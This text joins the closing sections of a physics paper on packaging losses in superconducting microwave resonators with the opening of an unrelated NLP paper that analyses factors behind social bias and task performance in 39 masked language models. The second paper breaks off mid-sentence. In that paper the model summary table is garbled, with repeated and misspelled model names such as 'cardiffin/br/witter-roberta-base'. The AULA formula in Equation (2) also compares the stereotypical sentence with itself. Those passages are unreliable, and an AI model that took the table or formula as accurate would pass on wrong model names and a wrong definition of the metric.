In addition, there was no longer a strong correlation between \(Q_{i,m}\) and the \(w\) and \(g\) of the resonators. To determine whether the \(Q_{i,m}\)'s could be improved further, two packages with overall the same geometry were manufactured from aluminum 6063 and used to measure the same resonator chip. One of them had no hole (Al\(\blacksquare\)) and one had a hole (Al\(\square\)). Similar to the Cu\(\square\) case, a smaller amount of glue was applied underneath or on the perimeter of the chip for both Al packages. Also, the Cu PCB, which was glued with a silver epoxy [13] to the Al package, was trimmed and cut into two pieces so that it was only within close proximity to the side of the chip with the input and output SMA launchers (see Fig. 1(b) and supplemental material). While the \(Q_{i,m}\)'s for the Al\(\blacksquare\) showed an overall increase over the \(Q_{i,m}\)'s measured in Cu\(\blacksquare\), an increase in the loss with resonator size from R2 to R5 was still observed. The data in the Al\(\square\) package had \(Q_{i,m}\)'s similar to those measured for Cu\(\square\). Next, we discuss a model and the use of microwave finite-element simulations to identify the observed sources of loss in our package. Figure 1: CAD rendering of resonator chip and surrounding PCB (lid and sidewall not shown). (a) Plan view of device in Cu\(\square\) package, showing substrate (cyan), resonators (red), center transmission line (white), surrounding PCB (orange), and glue above (dark purple) and below (light purple) the substrate. A series of connections were used to represent the wire-bond connections from the chip to the surrounding PCB. The size and approximate location of the optional hole is denoted with the dashed contour. (b) Trimetric view of chip and Al\(\square\) package. Figure 3: Bar chart of measured maximum \(Q_{i,m}\) on a log scale for each resonator in their corresponding Cu or Al package, without a hole (\(\blacksquare\)) and with a 4.2 x 4.2 mm\({}^{2}\) hole (\(\square\)) underneath the 5 x 5 mm\({}^{2}\) chip. Figure 2: Log-log plot of the fitted resonator internal quality factors versus stored photon number for the Cu\(\blacksquare\) package. As the width and gap of the resonator increases from R1 to R5, the measured power dependence is smaller and the maximum \(Q_{i,m}\) decreases. The dashed line on top is a weak \(\propto n^{0.1}\) power law as a guide. The semi-transparent arrows give a bound of the estimated \(Q_{i}\) for the resonators \(R_{2}\) to \(R_{5}\), assuming the surface underneath the substrate was filled with Ag impregnated adhesive as the lower bound and OFHC Cu as the upper bound (see text). ## III Model & Simulations Dissipation from induced eddy currents in the surrounding normal metal associated with the packaging was hypothesized as the source limiting \(Q_{i,m}\). Neglecting the anomalous skin effect, ac shielding currents in a normal metal with resistivity \(\rho\) decay on a length scale given by the skin depth \(\delta=\sqrt{\frac{2\rho}{2\pi f\mu_{o}}}\) at frequency \(f\); this results in an effective surface resistance \(R_{S}=\rho/\delta\).[14; 15] The power dissipated in \(R_{S}\) also produces a limitation in the internal quality factor given by[14] \[Q_{i,R_{S}}^{-1}=\frac{R_{S}}{2\pi f_{c}\mu_{o}}\gamma=\frac{R_{S}}{2\pi f_{c}\mu_{o}}\frac{\int\int_{S}|H|^{2}dS}{\int\int\int_{V}|H|^{2}dV}.
\tag{1}\] Here, the ratio of the two integrals, which we define as \(\gamma\), corresponds to a geometric factor of the ratio of the magnetic field energy at the surface of \(R_{S}\) to the total magnetic field energy. For scaling purposes, \(f_{c}=5.6\) GHz for R4 and the ratio \(R_{S}/(2\pi f_{c}\mu_{o})=(3.4\times 10^{-3}\sqrt{\rho})\ [{\rm m}/\Omega]^{1/2}\). There are three normal conductors of concern present in our packaging. First, the Ag impregnated glue was measured to have a relatively large dc resistivity of \(\rho_{\rm glue}=630\ \mu\Omega\cdot\)cm at \(T=77\) K. For the Ag glue, the ratio \(R_{S,glue}/(2\pi f_{c}\mu_{o})=8.5\times 10^{-6}\) m at 5.6 GHz, implying \(\gamma_{glue}<(1/8.5)\) m\({}^{-1}\) to achieve \(Q_{i}>10^{6}\). The other normal conductor of concern was the Cu used in the two Cu packages. From quality factor measurements of a 3D OFHC Cu cavity at \(T=3\) K, the resistivity of the Cu is estimated to be \(\rho_{\rm Cu}\simeq 0.6\ \mu\Omega\cdot\)cm. The third and final conductor was the PCB Cu. By manufacturing a bandpass microwave CPW resonator from a similar PCB and measuring \(Q\) at \(T=3\) K, a dc resistivity \(\rho_{\rm PCB}\simeq 2\ \mu\Omega\cdot\)cm was estimated.[16] These three values of \(\rho\) are used to estimate the loss. To calculate the geometric factor \(\gamma\) at the surface of each conductor of concern, the \(H\) field for each resonator in the different package geometries was simulated using Ansys's high frequency simulation software (HFSS). Each conductor in the simulation was assumed to be a perfect electric conductor to reduce simulation resources. To simulate the \(H\) field associated with the stored energy of the resonator, and not with the coupling to the CPW transmission line, we implemented two effects in the simulation. First, the connections between the signal trace of the resonator chip and the PCB were removed. This prevented radiation from leaking to the ports where the SMA connectors were located and also avoided a standing wave near a resonant frequency. Second, the open end of the quarter-wave resonator was shunted with an excitation lumped port with a matched impedance to the resonator waveguide, which is 50 \(\Omega\). The resonator was then excited at \(f_{\circ}\), which was determined by satisfying \({\rm Im}[Y_{11}(f_{\circ})]=0\), where \(Y_{11}\) is the self-admittance of the lumped port. We simulated each resonator in the four different packages and calculated \(\gamma\) for each conductor of concern. Table 1 presents the calculated geometric factors \(\gamma\) associated with the different normal conducting regions for each resonator in the different packages. These regions were the OFHC Cu material ("Base"), the Ag impregnated glue, and the PCB Cu used to feed signals to the resonator device. Since glue was pervasive underneath the entire substrate of the chip in the Cu\(\blacksquare\) package, we have combined base and glue together for that measurement. For other packages, pictures of the device were used to identify the placement of the glue and hence the regions to calculate \(\gamma\) (see purple regions in Fig. 1). Using the corresponding geometric values from Table 1 and the measured resistivity values, losses due to the glue, Cu package, and PCB were calculated using Eq. 1 and compared against measured values in the bar chart of Fig. 4. Note that for the Cu\(\blacksquare\) package, a 70% fill rate for the glue was assumed.
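The arithmetic behind these estimates is compact enough to reproduce; the sketch below evaluates the \(R_{S}/(2\pi f_{c}\mu_{0})\) prefactor for the three measured resistivities and the resulting \(Q_{i}\) limit for a given geometric factor \(\gamma\) (Eq. 1). The resistivities and the example \(\gamma\) values are the ones quoted in the text; everything else is standard constants.

```python
import numpy as np

MU0 = 4e-7 * np.pi            # vacuum permeability, H/m
F_C = 5.6e9                   # reference resonance frequency used in the text, Hz

def rs_over_omega_mu0(rho_ohm_m, f_hz=F_C):
    """R_S / (2 pi f mu0) = sqrt(rho / (2 * 2 pi f mu0)), in metres (Eq. 1 prefactor)."""
    omega_mu0 = 2.0 * np.pi * f_hz * MU0
    return np.sqrt(rho_ohm_m / (2.0 * omega_mu0))

def q_limit(rho_ohm_m, gamma_per_m, f_hz=F_C):
    """Internal-Q limit 1 / (prefactor * gamma) from Eq. 1."""
    return 1.0 / (rs_over_omega_mu0(rho_ohm_m, f_hz) * gamma_per_m)

rho = {                        # dc resistivities quoted in the text, Ohm*m
    "Ag glue": 630e-8,         # 630 uOhm*cm
    "OFHC Cu": 0.6e-8,         # 0.6 uOhm*cm
    "PCB Cu":  2.0e-8,         # 2 uOhm*cm
}

for name, r in rho.items():
    print(f"{name:8s}: R_S/(2 pi f mu0) = {rs_over_omega_mu0(r):.2e} m")

# Example: R5 in the Cu (filled) package, glue gamma ~ 1.2 1/m (70% fill of 1.6 1/m)
print("Q_i limit, R5 glue :", f"{q_limit(630e-8, 1.2):.1e}")
# Example: largest glue gamma compatible with Q_i > 1e6
print("gamma for Q_i=1e6  :", f"{1.0 / (rs_over_omega_mu0(630e-8) * 1e6):.3f} 1/m")
```

These numbers reproduce the \(8.5\times10^{-6}\) m prefactor for the glue, the \(\gamma\lesssim 0.12\) m\({}^{-1}\) requirement for \(Q_{i}>10^{6}\), and the \(\sim\!10^{5}\) limit quoted for R5 in the next paragraph.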
For R5 in Cu\(\blacksquare\), as an example, \(0.7\times\gamma_{\rm glue}=1.2\) m\({}^{-1}\), implying \(Q_{i,R_{S}}\simeq 1\times 10^{5}\), a value comparable to the observed measured loss. Loss from the glue explains the \(w\) and \(g\) trend observed in the Cu\(\blacksquare\) package and the apparent random high loss measured with R4 and R5 in the other three packages. We note that Goetz _et al._ reached a similar conclusion for their source of loss being associated with a conducting adhesive.[17] Nonetheless, several benefits of the hole underneath the chip are noted: 1. The induced currents in the PCB are reduced due to the stored \(H\) field residing in vacuum underneath the device (for Al\(\blacksquare\) and Al\(\square\)). 2. The amount of rf current flowing on and off the chip through the wire bonds is decreased. 3. The fundamental resonant frequency of spurious package modes, which can couple to the quantum device and result in decoherence, increases due to the lower dielectric constant of the vacuum in the hole. Simulations show the frequency of the first package mode increases from approximately 11 GHz up to 22 GHz. \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|c|c|c|} \hline R\# & \multicolumn{2}{c|}{Cu\(\blacksquare\)} & \multicolumn{3}{c|}{Cu\(\square\)} & \multicolumn{2}{c|}{Al\(\blacksquare\)} & \multicolumn{2}{c|}{Al\(\square\)} \\ \cline{2-10} & Base/Glue & PCB & Base & PCB & Glue & PCB & Glue & PCB & Glue \\ \hline R1 & 0.02 & 0.01 & - & - & - & - & - & - & - \\ \hline R2 & 0.12 & 0.06 & 0.01 & - & - & - & 0.01 & - & - \\ \hline R3 & 0.35 & 0.16 & 0.02 & 0.02 & - & 0.06 & 0.02 & 0.01 & - \\ \hline R4 & 0.95 & 0.42 & 0.06 & 0.04 & 0.12 & 0.24 & 0.07 & 0.03 & 0.01 \\ \hline R5 & 1.6 & 0.89 & 0.16 & 0.13 & 0.04 & 0.77 & 0.22 & 0.12 & 0.03 \\ \hline \end{tabular} \end{table} Table 1: HFSS simulated magnetic field geometric factors \(\gamma\) in units of m\({}^{-1}\), for the different size resonators and in the various packages. Three surfaces were considered for the geometric factor calculations: the Cu packaging “Base”, the “PCB” Cu, and regions where “Glue” was used to adhere the device. \(\gamma\) factors smaller than 0.005 m\({}^{-1}\) are left blank. Figure 4: Comparison of estimated and measured resonator loss \(1/Q_{i,m}\) for each resonator and in each package. Note the scale of the y-axis changes at \(1\times 10^{-6}\). Finally, a slight increase in \(Q_{i,m}\) with an increase in resonator width and gap for R1 to R3 in Al\(\square\) was observed (see Fig. 4). To account for this small trend, a 0.35 nm thick surface interface dielectric loss was added using \(\tan\delta\sim 10^{-3}\) and COMSOL was used to simulate this "surface loss" (see supplementary materials for details).[12] ## IV Conclusion In this work, we found that conducting losses associated with resistive materials used in the packaging resulted in an increase in the internal losses of superconducting microwave resonators. To explore the source of these losses, a resonator chip was measured in four different packages and finite-element microwave simulations were performed.
Our measurements and simulations show that resonators with wider center line traces and gaps induced a larger amount of eddy shielding currents in conducting material directly below the substrate of the chip and that this could limit the resonator's \(Q_{i}\) when that conductor had a large resistivity. A predominant source of our loss was associated with the silver impregnated glue that was used as the adhesive between the substrate and the package base. This loss and loss from a normal metal conducting PCB surrounding the device can be mitigated by creating a hole in the package directly below the chip and using material with a smaller surface resistance. While the effect of different packages on the quality factors of superconducting coplaner waveguide resonators was studied in this paper, these results can be extended to superconducting transmon qubits. In particular, an x-mon qubit[18] with \(w=g=30\)\(\mu\)m and a fundamental resonance at \(f_{\circ}=6\) GHz was simulated. The center of the x-mon was placed 1.25 mm away from both edges of the substrate in Cu\(\blacksquare\), and in the absence of the conducting glue a \(T_{1}\sim 3\)\(\mu\)s limited by the surface resistance of the Cu backing was found. Switching to Al\(\square\) would increase \(T_{1}\sim 80\)\(\mu\)s limited by the Cu in the PCB. Furthermore, to downconvert hot phonons and reduce quasiparticle tunneling charge parity rates, a few groups have electroplated Cu on the backside of the substrate in a grid of squares[19]. For a \(0.5\times 0.5\) mm\({}^{2}\) Cu grid with a 50% fill rate, enough induced currents are produced such that \(T_{1}\simeq 18\)\(\mu\)s for the x-mon considered here. Based on the results of this paper, a few final recommendations are made: 1. The use of normal conducting glues is not recommended; better choices are the use of dielectric glues or no glue.[20] 2. Increasing the separation between the resonator or qubit device and normal conducting material with the use of holes underneath the substrate or the use of thicker substrates significantly reduces currents underneath as well as on and off the device through the wirebonds. 3. The use of superconductors with a smaller surface resistance in the package and PCB could be essential to decrease the loss in very low loss future qubits or resonators. 4. Knowledge of the microwave surface resistance of various materials used in the package is valuable information. 5. Simulations similar to the ones performed here to estimate \(\gamma\) are a valuable tool to utilize. With some of these recommendations, the lifetimes for our planar transmon qubits have risen from a few microseconds to \(T_{1}\sim 100\)\(\mu\)s. ###### Acknowledgements. The authors acknowledge useful suggestions and conversations with Christopher Lobb. The authors thank Danielle Braje and MIT Lincoln Laboratory for the design of the resonator chip and Ashish Alexander and Chris Richardson for the use of their PCB. ## Data Availability Statement The data that support the findings of this study are available from the corresponding author upon reasonable request.
2310.12936
A Predictive Factor Analysis of Social Biases and Task-Performance in Pretrained Masked Language Models
Various types of social biases have been reported with pretrained Masked Language Models (MLMs) in prior work. However, multiple underlying factors are associated with an MLM such as its model size, size of the training data, training objectives, the domain from which pretraining data is sampled, tokenization, and languages present in the pretrained corpora, to name a few. It remains unclear as to which of those factors influence social biases that are learned by MLMs. To study the relationship between model factors and the social biases learned by an MLM, as well as the downstream task performance of the model, we conduct a comprehensive study over 39 pretrained MLMs covering different model sizes, training objectives, tokenization methods, training data domains and languages. Our results shed light on important factors often neglected in prior literature, such as tokenization or model objectives.
Yi Zhou, Jose Camacho-Collados, Danushka Bollegala
2023-10-19T17:33:33Z
http://arxiv.org/abs/2310.12936v2
A Predictive Factor Analysis of Social Biases and Task-Performance in Pretrained Masked Language Models ###### Abstract Various types of social biases have been reported with pretrained Masked Language Models (MLMs) in prior work. However, multiple underlying factors are associated with an MLM such as its model size, size of the training data, training objectives, the domain from which pretraining data is sampled, tokenization, and languages present in the pretrained corpora, to name a few. It remains unclear as to which of those factors influence social biases that are learned by MLMs. To study the relationship between model factors and the social biases learned by an MLM, as well as the downstream task performance of the model, we conduct a comprehensive study over 39 pretrained MLMs covering different model sizes, training objectives, tokenization methods, training data domains and languages. Our results shed light on important factors often neglected in prior literature, such as tokenization or model objectives. ## 1 Introduction Masked Language Models (MLMs) have achieved promising performance in many NLP tasks Devlin et al. (2019); Liu et al. (2019); Liang et al. (2023). However, MLMs trained on massive amounts of textual training data have also been found to encode concerning levels of social biases such as gender and racial biases Kaneko and Bollegala (2019); May et al. (2019); Dev et al. (2020); Silva et al. (2021); Kaneko et al. (2022). In spite of the overall success of MLMs across NLP tasks, such biases within MLMs raise ethical considerations and underscore the need for debiasing methods to ensure fair and unbiased MLMs. On the other hand, MLMs are trained by considering and optimising various underlying factors that contribute to their performance on downstream tasks. These factors include but are not limited to parameter size, tokenization methods, training objectives and training corpora. The performance of MLMs is affected by the interplay of such factors. Nevertheless, it remains unclear as to how these factors influence social biases in MLMs and their downstream task performance. Evaluating the impact of these factors is challenging due to three main reasons: (a) The factors that we consider within a model are not independent, rather, they exhibit complicated interdependence and affect the performance of models simultaneously. (b) MLMs are diverse with different architectures, configurations and parameters. The diversity across models requires the need for generalisation and abstraction when considering the values of factors. (c) Many recent works proposed debiasing methods to mitigate social biases in MLMs Webster et al. (2020); Lauscher et al. (2021); Schick et al. (2021); Guo et al. (2022). However, most debiasing methods tend to worsen the performance of MLMs in downstream tasks Meade et al. (2022). Therefore, it is crucial to consider the trade-off between social bias and downstream task performance when comparing MLMs. To address the non-independent issue of factors, we propose a method using Gradient Boosting Freund and Schapire (1997) to consider dependencies among factors. Moreover, we use the coefficient of determination (\(R^{2}\); Nagelkerke et al. (1991)) as a measure to analyse the importance of factors. Regarding the diversity of MLMs, we converge a broad set of MLMs across multiple languages and 4 domains, resulting in 39 MLMs for evaluation in total. 
Moreover, we incorporate TweetEval and GLUE to evaluate the downstream task performance of MLMs, meanwhile, evaluating their social biases intrinsically using All Unmasked Likelihood with Attention weights (AULA; Kaneko and Bollegala (2022)) on two benchmarks StereoSet (SS; Nadeem et al. (2021)) and crowdsourced stereotype pairs benchmark (CP; Nangia et al. (2020)). Note that we are not proposing novel bias evaluation measures in this paper. Instead, we use existing metrics such as AULA to evaluate social biases. Our experimental results indicate that model size, training objectives and tokenization are the three most important categories of factors that affect the social bias and downstream task performance of MLMs. Interestingly, we observe that models using Byte-Pair Encoding (BPE; Sennrich et al., 2016) include lower level of social biases, while achieving the best downstream performance compared to models using other tokenization methods. Overall, multilingual models tend to have less biases than their monolingual counterparts. ## 2 Related Work As MLMs have been successfully applied to diverse NLP tasks, it is important to study the factors that determine their social biases. Rogers et al. (2020) reviewed the current state of knowledge regarding how BERT works, what kind of information it learns and how it is encoded, typically alterations to its training objectives and architecture, the overparameterization issue and approaches to compression. Xia et al. (2020) studied contextualised encoders in various aspects and discussed the trade-off between task performance and the potential harms contained in the pretraining data. Later, Perez-Mayos et al. (2021) investigated the effect of pretraining data size on the syntactic capabilities of RoBERTa and they showed that models pretrained with more data tend to encode better syntactic information and provide more syntactic generalisation across different syntactic structures. However, these studies focus on MLMs in downstream tasks, while none consider the social biases in MLMs. On the other hand, models trained for different downstream tasks have been found to exhibit social biases. Kiritchenko and Mohammad (2018) evaluated gender and racial biases across 219 automatic sentiment analysis systems and discovered statistically significant biases occurring in several systems. Diaz et al. (2018) studied age-related biases in sentiment classification and discovered that significant age bias is encoded in the output of many sentiment analysis systems as well as word embeddings. Zhao et al. (2020) focused on gender bias in multilingual embeddings and its influence on the process of transfer learning for NLP applications. They showed that the level of bias in multilingual representations varies depending on how the embeddings are aligned to different target spaces, and that the alignment direction can also affect the bias in transfer learning. Choenni et al. (2021) investigated the types of stereotypical information that are captured by pretrained language models and showed the variability of attitudes towards various social groups among models and the rapid changes in emotions and stereotypes that occur during the fine-tuning phase. Existing bias evaluation methods use different strategies such as pseudo likelihood (Kaneko and Bollegala, 2022), cosine similarity (Caliskan et al., 2017; May et al., 2019), inner-product (Ethayarajh et al., 2019), to name a few. 
Independently of any downstream tasks, intrinsic bias evaluation measures (Nangia et al., 2020; Nadeem et al., 2021; Kaneko and Bollegala, 2022) evaluate social biases in MLMs stand alone. However, given that MLMs are used to represent input texts in a variety of downstream tasks, multiple previous works have proposed that social biases should be evaluated with respect to those tasks (De-Arteaga et al., 2019; Webster et al., 2020). Kaneko and Bollegala (2021) showed that there exists only a weak correlation between intrinsic and extrinsic social bias evaluation measures. In this paper, we use an intrinsic bias evaluation measure, namely AULA, to evaluate social biases in MLMs. AULA has been shown to be the most reliable bias evaluation measure (Kaneko and Bollegala, 2022), hence we use it as our bias evaluation measure. Although we specifically focus on MLMs in this paper, evaluating the performance predictors for Neural Architecture Search (NAS) (White et al., 2021; Elsken et al., 2019) has been conducted for designing high performance neural networks. Generalisability of the identified factors is an important in NAS because the selected neural architecture would be trained on different datasets to obtain different models. Although it would be ideal to perform a controlled training of MLMs where we experimentally fix all other factors except for a single target factor and then analyse the trained MLM, this is an expensive undertaking given the computational cost of training MLMs on large datasets. On the other hand, we consider already pre-trained MLMs that are publicly made available and do not train any MLMs during this work. ## 3 Analysis of Factors In order to study the impact of different factors in MLMs, we consider 30 factors and split them into 5 categories. The details of each individual factor are provided in Appendix C. ### Model Size Models with smaller sizes are generally more lightweight and require less computational resources, making them suitable for deployment on resource-constrained devices or in environments with limited processing power. However, larger models tend to have better performance on downstream tasks but demand more memory, computational power, and longer inference times. On the other hand, the different architectures of models have various numbers of layers as well as training parameters. Recently, MLMs have achieved impressive results on downstream tasks by scaling model size or training with larger datasets (Conneau et al., 2020; Goyal et al., 2021; Liang et al., 2023). To investigate the impact of model size, we consider 3 factors: (1) parameter size, (2) number of layers and (3) vocabulary size. The parameter size is considered as a categorical feature, in which we divide the parameter size of an MLM into 3 categories according to pre-defined ranges. Specifically, we assign S if the parameter size of an MLM is less than 100M, M if the size is within 100M-300M, and L if the size is greater than 300M. Similarly, we convert the vocabulary size into the same three categories for the models with vocabulary sizes less than 50K, within 50K-100K and greater than 100K, respectively. For the number of layers, we use the number as a feature: 6, 12 and 24 layers. ### Training Methods and Objectives In this category, we consider the methods used during model pretraining as well as the training objectives of MLMs. First, we take into account different masking techniques, starting with the masking technique initially proposed for training BERT (Devlin et al., 2019). 
Masked language modelling is an objective used during pretraining to improve the model's understanding, in which a certain percentage of words in the input text are randomly selected and replaced with a special [MASK] token, then the model is trained to predict the original word based on its context. Later, they further proposed whole word masking, which aims to improve the handling of individual words with a context. Rather than randomly selecting WordPiece (Wu et al., 2016) produced subtokens to mask, whole word masking always masks the entire words at once, which has been shown to reduce ambiguity and enable better word-level comprehension and contextual understanding for MLMs (Cui et al., 2021). Apart from these two masking techniques, we consider three other training objectives: (a) next sentence prediction, (b) sentence ordering prediction, and (c) mention reference prediction. We consider the training objectives to be binary and assign 1 if each of them is used and 0 otherwise. Model distillation is a training technique aiming to train a small student model to transfer the knowledge and capabilities from a larger teacher model (Hinton et al., 2015). This technique has been shown to effectively compact a large language model, while retaining comparable performance compared to the original model (Sanh et al., 2019; Wu et al., 2022). Model distillation is regarded as a binary factor, which is assigned 1 if an MLM uses model distillation, otherwise, it returns 0. ### Training Corpora Training corpora are the collections of texts or data used to train MLMs. According to Kalyan et al. (2021), training corpora can be classified into four types: (1) general, (2) social media, (3) language-specific and (4) domain-specific. In order to conduct a comprehensive study of MLMs trained using different types of training corpora, we cover all four types of training corpora, resulting in four different domains (including general domain): (1) General Domain: BookCorpus (Books), Wikipedia (Wiki), Common Crawl-News (CCNews), OpenWebText (OWT), and Stories; (2) Social Media: Tweets and the Reddit Abusive Language English dataset (RALE); (3) Legal Domain: Patent Litigations, Caselaw Access Project (Caselaw) and Google Patents Public Data (GooglePatents); (4) Biomedical Domain: Full-text biomedical papers from the Semantic Scholar Open Research Corpus (S2ORC), PubMed Abstracts (PMed), PMC Full-text articles and the Medical Information Mart for Intensive Care III (MIMIC3); Finally, we also consider a multilingual corpus: CommonCrawl Corpus in 100 languages (CC100). Each of the training corpora is considered as an individual binary factor. Owing to the domain of an MLM being associated with the training corpora sampled in that certain domain, we additionally consider domain as a separate factor. This domain factor is included as a categorical factor, with 4 different domains as categories: general domain, social media, legal domain and biomedical domain. Finally, we take into account continuous training as a binary factor which takes 1 if an MLM is continuously trained on training corpora from different domains and 0 if the model is trained from scratch. ### Tokenization Tokenization is an essential process of breaking down a sequence of text into smaller units, which is able to convert unstructured text data into a format that can be processed by MLMs. Prior works study different tokenization methods on MLMs in different languages Park et al. (2020); Rust et al. (2021); Toraman et al. 
(2023), however, the impact of tokenization methods on social bias in MLMs and different downstream tasks remains unrevealed. Therefore, we consider the three most commonly used tokenization methods as categorical factors: BPE, WordPiece and SentencePiece. ### Language In this category, we consider both monolingual and multilingual MLMs. Specifically, we regard language as a categorical factor and use _English_ and _Multilingual_ to represent if an MLM is monolingual or multilingual, respectively. In addition, the number of languages is also considered as a separate factor, which is categorical and takes the actual number of languages an MLM trained on. ## 4 Masked Language Models To conduct a comprehensive study of different factors of MLMs affecting social bias and task performance, we evaluate 39 pretrained MLMs,1 which we divide into four categories as follows. Table 1 summarizes all models. Footnote 1: In our initial selection of models, albert-xlarge-v2, nirels/coref-roberta-large, vinai/bertweet-large, xlm-roberta-base and facebook/xlm-v-base attained an unusual poor performance on the Corpus of Linguistic Acceptability (CoLA) (i.e., a subtask of GLUE) and TweetEval. This is likely caused by an implementation issue that would need some modification. Therefore, to avoid potentially false outliers, we omitted these five models when evaluating TweetEval and GLUE. Monolingual and domain-specific modelsWe consider the MLMs either directly or continuously trained in domain-specific English corpora with different settings, consisting of RoBERTa in social media domain Barbieri et al. (2020), BERT in social media domain Nguyen et al. (2020); Caselli et al. (2021), RoBERTa in legal domain Geng et al. (2021), RoBERTa in biomedical domain Gururangan et al. (2020), and BERT in biomedical domain Alsentzer et al. (2019); Lee et al. (2020); Peng et al. (2019). Multilingual and general domain modelsWe take into account the multilingual MLMs with different settings pretrained in the general domain, containing different settings of multilingual BERT Devlin et al. (2019), DistillBERT Sanh et al. (2019) and XLM-R Conneau et al. (2020). Multilingual and domain-specific modelsWe select the multilingual MLMs pretrained in domain-specific corpora, containing XLM-T Barbieri et al. (2022). ## 5 MLM Evaluation Metrics and Tasks Our goal in this paper is to study the relationship between model factors and social bias as well as downstream task performance in pretrained MLMs. For this purpose, we conduct our evaluations using three different types of tasks. 
\begin{table} \begin{tabular}{l l} \hline \hline Model Type & Models \\ \hline General Domain & roberta-base, roberta-large, bert-base-cased, bert-large-cased, bert-large-uncased, bert-large-uncased, bert-large-uncased, bert-large-uncased-whole-word-masing, albert-base-v2, albert-large-v2, albert-large-v2, albert-large-v2, albert-large-v2, albert-large-v2, \\ (Monolingual) & albert-xlarge-v2, albert-base-cased, distilbert-base-uncased, distilbert-base-uncased, distilbert-base-uncased, distilbert-base, bert-large-uncased, whole-word-masing, nirels/coref-roberta-large, nirels/coref-roberta-base, nirels/coref-bert-large \\ \hline Domain-specific & cardiffin/br/witter-roberta-base, cardiffin/brwitter-roberta-base, scratch-roberta-base, vinai/bertweet-large, GroNLP,@rateBERT, al-lai/biomed_roberta_base, saiho/legal-roberta-base, ensily/olement/Bio_ClinicalBERT, \\ (Monolingual) & emily/aetter/Bio_ClinicalBERT, \\ & dmis-lab/biobject-base-cased-v1,2 \\ & bionlp/bluebert_pubmed_mimic_uncased_L-12_H- \\ & 768.A-12, bionlp/bluebert_pubmed_mimic_uncased_L- \\ & 24.H-102.A-16, cardiffin/brwitter-roberta-large- \\ & 2022-154m, cardiffin/brwitter-roberta-base-2022- \\ & 154m \\ \hline General Domain & bert-base-multilingual-cased, bert-base-multilingual-uncased, distilbert-base-multilingual-cased, \\ (Multilingual) & xlm-roberta-base, xlm-roberta-large, xlm-v-base \\ \hline Domain-specific & cardiffin/brwitter-xlm-roberta-base \\ (Multilingual) & cardiffin/brwitter-xlm-roberta-base \\ \hline \hline \end{tabular} \end{table} Table 1: Summary of the MLMs in the analysis. ### Social Bias For an MLM under evaluation, we compare the pseudo-likelihood scores returned by the model for stereotypical and anti-stereotypical sentences using AULA (Kaneko and Bollegala, 2022). AULA evaluates social biases by taking into account the MLM attention weights as the importance of tokens. This approach is shown to be robust against frequency biases in words and offers more reliable estimates compared to alternative metrics used to evaluate social biases in MLMs. Following the standard evaluation protocol, we provide AULA the complete sentence \(S=t_{1},\dots,t_{|S|}\), which contains a length \(|S|\) sequence of tokens \(t_{i}\), to an MLM with pretrained parameters \(\theta\). We compute the Pseudo Log-Likelihood, denoted by \(\mathrm{PLL}(S)\), to predict all tokens in \(S\) excluding begin and end of sentence tokens. The PLL(S) score of sentence \(S\) given by (1) can be used to evaluate the preference expressed by an MLM for \(S\): \[\mathrm{PLL}(S)\coloneqq\frac{1}{|S|}\sum_{i=1}^{|S|}\alpha_{i}\log P(t_{i}|S ;\theta) \tag{1}\] Here \(\alpha_{i}\) is the average of all multi-head attention weights associated with \(t_{i}\), while \(P(t_{i}|S;\theta)\) is the probability assigned by the MLM to token \(t_{i}\) conditioned on \(S\). Given a sentence pair, the percentage of stereotypical (\(S^{st}\)) sentence preferred by the MLM over anti-stereotypical (\(S^{at}\)) one is considered as the AULA _bias score_ of the MLM and is given by (2): \[\mathrm{AULA}=\left(\frac{100}{N}\sum_{(S^{\mathrm{st}},S^{\mathrm{st}})} \mathbb{I}(\mathrm{PLL}(S^{\mathrm{st}})>\mathrm{PLL}(S^{\mathrm{st}}))\right) \tag{2}\] Here, \(N\) is the total number of text instances and \(\mathbb{I}\) is the indicator function, which returns \(1\) if its argument is True and \(0\) otherwise. 
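A minimal sketch of the scoring in (1) and (2), assuming the per-token log-probabilities \(\log P(t_{i}|S;\theta)\) and the averaged multi-head attention weights \(\alpha_{i}\) have already been extracted from the MLM for every sentence (the helper names below are illustrative):

```python
from typing import Sequence, Tuple

def pll(log_probs: Sequence[float], attn: Sequence[float]) -> float:
    """Attention-weighted pseudo log-likelihood of one sentence, Eq. (1)."""
    assert len(log_probs) == len(attn)
    return sum(a * lp for a, lp in zip(attn, log_probs)) / len(log_probs)

Sentence = Tuple[Sequence[float], Sequence[float]]  # (log-probs, attention weights)

def aula(pairs: Sequence[Tuple[Sentence, Sentence]]) -> float:
    """Eq. (2): percentage of (stereotypical, anti-stereotypical) pairs for which
    the MLM prefers the stereotypical sentence; a score near 50 indicates an unbiased model."""
    pairs = list(pairs)
    hits = sum(1 for st, at in pairs if pll(*st) > pll(*at))
    return 100.0 * hits / len(pairs)

# toy example with two pairs, one preference in each direction -> score 50.0
st1, at1 = ([-2.0, -1.0], [0.6, 0.4]), ([-2.5, -1.2], [0.5, 0.5])
st2, at2 = ([-3.0, -2.0], [0.5, 0.5]), ([-1.0, -0.8], [0.7, 0.3])
print(aula([(st1, at1), (st2, at2)]))
```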
AULA score given by (2) falls within the range \([0,100]\) and an unbiased model would return bias scores close to 50, whereas bias scores less or greater than 50 indicate bias directions towards the anti-stereotypical or stereotypical group, respectively. Social Bias BenchmarksWe conduct experiments on the two most commonly used social bias evaluation datasets for MLMs: StereoSet (SS) and Crowdsourced Stereotype Pairs benchmark (CP). SS contains associative contexts, which cover four types of social biases: race, gender, religion, and profession, while CP is crowdsourced and annotated by workers in the United States, consisting of nine types of social biases: race, gender, sexual orientation, religion, age, nationality, disability, physical appearance, and socioeconomic status/occupation. We follow the work from Kaneko and Bollegala (2022)2 and use the default setting for evaluation. We denote the AULA computed on the CP and SS datasets by A-CP and A-SS, respectively, in the rest of the paper. Footnote 2: [https://github.com/kanekomashiro/evaluate_bias_in_mlm](https://github.com/kanekomashiro/evaluate_bias_in_mlm) ### Downstream Performance To further investigate the impact of factors of an MLM in terms of its downstream tasks performance, we evaluate MLMs on two additional benchmark datasets: The General Language Understanding Evaluation (GLUE) benchmark (Wang et al., 2018)3 and social media TweetEval benchmark (Barbieri et al., 2020).4 Footnote 3: [https://gluebenchmark.com/](https://gluebenchmark.com/) Footnote 4: [https://github.com/cardifrnlp/tweeteval](https://github.com/cardifrnlp/tweeteval) GlueGLUE is comprised of 9 tasks for evaluating natural language understanding systems. The tasks in GLUE are Corpus of Linguistic Acceptability (CoLA; Warstadt et al., 2019), Stanford Sentiment Treebank (SST-2; Socher et al., 2013), Microsoft Research Paraphrase Corpus (MRPC; Dolan and Brockett, 2005), Semantic Textual Similarity Benchmark (STS-B; Cer et al., 2017), 